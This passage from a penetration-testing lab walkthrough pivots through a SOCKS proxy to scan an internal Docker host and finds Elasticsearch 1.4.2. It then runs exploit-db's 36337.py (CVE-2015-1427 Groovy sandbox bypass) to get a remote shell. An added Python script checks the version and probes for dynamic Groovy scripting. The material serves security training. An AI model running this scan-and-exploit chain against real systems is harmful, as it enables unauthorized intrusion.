- The container looks very much like our earlier target, so we point Firefox at a proxy and browse to http://172.17.0.1:5000. Browser proxy setup can be looked up on Baidu; the important part is to choose manual proxy configuration and set the SOCKS host and port to the same values used in the proxychains.conf from earlier.
- The page we get back is identical to the one we saw before, so we can conclude that 172.17.0.1 is the host machine we previously reached as 192.168.56.101.
- Next, probe 172.17.0.2 through the same proxy. Only a full TCP connect scan (-sT) can be tunnelled through a SOCKS proxy, and host discovery has to be skipped (-Pn) because ICMP and raw packets never reach the proxy:

```
┌──(kali㉿kali)-[~/Workspace]
└─$ proxychains4 -f ./proxychains.conf nmap -Pn -sT -sV 172.17.0.2
[proxychains] config file found: ./proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-19 20:39 CST
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:1720  <--denied
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:1025  <--denied
......
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:9200  ...  OK
[proxychains] Strict chain  ...  192.168.56.103:1080  ...  172.17.0.2:9200  ...  OK
Nmap scan report for 172.17.0.2
Host is up (0.0066s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
9200/tcp open  http    Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds
```
- A new lead: port 9200 on 172.17.0.2 is open and serves Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2). Background: Elasticsearch is the distributed search and analytics engine at the core of the Elastic Stack, and the version string nmap pulled from the REST banner is what we will match against known exploits.
- Here we can use searchsploit to look up Elasticsearch exploits and try them to break in:

```
┌──(kali㉿kali)-[~/Workspace]
└─$ searchsploit Elasticse
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
ElasticSearch - Remote Code Execution                                        | linux/remote/36337.py
ElasticSearch - Remote Code Execution                                        | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)                    | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download                                | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure                                     | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                        | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)         | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump                           | multiple/webapps/50152.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
- Try /usr/share/exploitdb/exploits/linux/remote/36337.py. Note that it is a Python 2 script and needs the requests module; if either is missing, install them as follows and then run the exploit through the same proxy chain:

```
sudo apt-get install python2                                            # install python2
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py  # install pip for python2 (skip if already present)
python2 -m pip install requests                                         # install the requests package
proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2  # run the 36337.py exploit
```
- We get in. The exploit works because Elasticsearch 1.4.2 still evaluates dynamic Groovy scripts in search requests and its Groovy sandbox can be escaped (CVE-2015-1427, fixed in 1.3.8 and 1.4.3). The shell it drops is only semi-interactive, so use it to pull in a proper payload:

```
┌──(kali㉿kali)-[~/Workspace]
└─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2
[proxychains] config file found: ./proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[ASCII-art banner omitted]
Exploit for ElasticSearch , CVE-2015-1427   Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$
```
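Before firing an exploit it is worth confirming that the banner really puts the target in the affected range and that the precondition (dynamic Groovy scripting) holds. The script below is an added example, not part of the original writeup and not taken from 36337.py: it parses the nmap -sV line from the scan above, applies the CVE-2015-1427 fix boundaries (1.3.8 / 1.4.3), and builds a harmless script_fields probe plus a parser for the Elasticsearch 1.x search response. The request and response shapes, the constructed sample response, and the hypothetical `send_probe` helper are assumptions; nothing is executed on the target. Run it under proxychains4 like the other commands so the live probe goes through the same SOCKS chain.

```python
"""Added example (not from the writeup or from exploit-db's 36337.py): triage
the Elasticsearch banner from nmap -sV, decide whether CVE-2015-1427 can apply,
and build/parse a benign probe showing whether dynamic Groovy scripting is on."""
import json
import re
from urllib.request import Request, urlopen

# The nmap -sV service line exactly as it appears in the scan above.
NMAP_LINE = ("9200/tcp open  http    Elasticsearch REST API 1.4.2 "
             "(name: Watcher; cluster: elasticsearch; Lucene 4.10.2)")


def parse_es_banner(line):
    """Return the Elasticsearch version from an nmap -sV line as (major, minor, patch)."""
    m = re.search(r"Elasticsearch REST API (\d+)\.(\d+)\.(\d+)", line)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def vulnerable_to_cve_2015_1427(version):
    """CVE-2015-1427 (Groovy sandbox bypass) was fixed in 1.3.8 and 1.4.3.
    Only the Groovy-based 1.3.x and 1.4.x lines are in scope: older releases
    default to a different script engine and need a different check, and
    1.5+ ships the fix."""
    major, minor, patch = version
    if (major, minor) == (1, 3):
        return patch < 8
    if (major, minor) == (1, 4):
        return patch < 3
    return False


def groovy_probe_body():
    """A benign script_fields query. If the node evaluates '1+1' it accepts
    dynamic Groovy scripts, the precondition the exploit relies on. The script
    stays inside the sandbox; nothing is executed on the host."""
    return json.dumps({
        "size": 1,
        "query": {"match_all": {}},
        "script_fields": {"probe": {"script": "1+1", "lang": "groovy"}},
    })


def probe_result(response_text):
    """Extract the 'probe' script field from an ES 1.x search response.
    Returns None when no hit carries it: script_fields are computed per hit,
    so an empty cluster yields nothing even when scripting is enabled."""
    data = json.loads(response_text)
    for hit in data.get("hits", {}).get("hits", []):
        values = hit.get("fields", {}).get("probe")
        if values:
            return values[0]
    return None


def send_probe(host, port=9200, timeout=10):
    """Hypothetical live check. proxychains hooks connect(), so when this
    script is started with proxychains4 the socket urllib opens is pushed
    through the same SOCKS chain as nmap and the exploit above."""
    req = Request("http://%s:%d/_search" % (host, port),
                  data=groovy_probe_body().encode(),
                  headers={"Content-Type": "application/json"},
                  method="POST")
    with urlopen(req, timeout=timeout) as resp:
        return probe_result(resp.read().decode())


# Constructed sample response in the ES 1.x shape (not captured from the target).
SAMPLE_RESPONSE = json.dumps({
    "took": 3, "timed_out": False,
    "hits": {"total": 1, "max_score": 1.0, "hits": [
        {"_index": "test", "_type": "doc", "_id": "1", "_score": 1.0,
         "fields": {"probe": [2]}}]}})

if __name__ == "__main__":
    v = parse_es_banner(NMAP_LINE)
    print("version %s, CVE-2015-1427 candidate: %s"
          % (".".join(map(str, v)), vulnerable_to_cve_2015_1427(v)))
    print("offline probe parse:", probe_result(SAMPLE_RESPONSE))
    # live: proxychains4 -f ./proxychains.conf python3 es_triage.py
```

A probe value of 2 means the sandbox bypass exploit is worth running; None on a confirmed 1.4.2 usually means the cluster has no documents yet, which is why the exploit script indexes one before it sends its script.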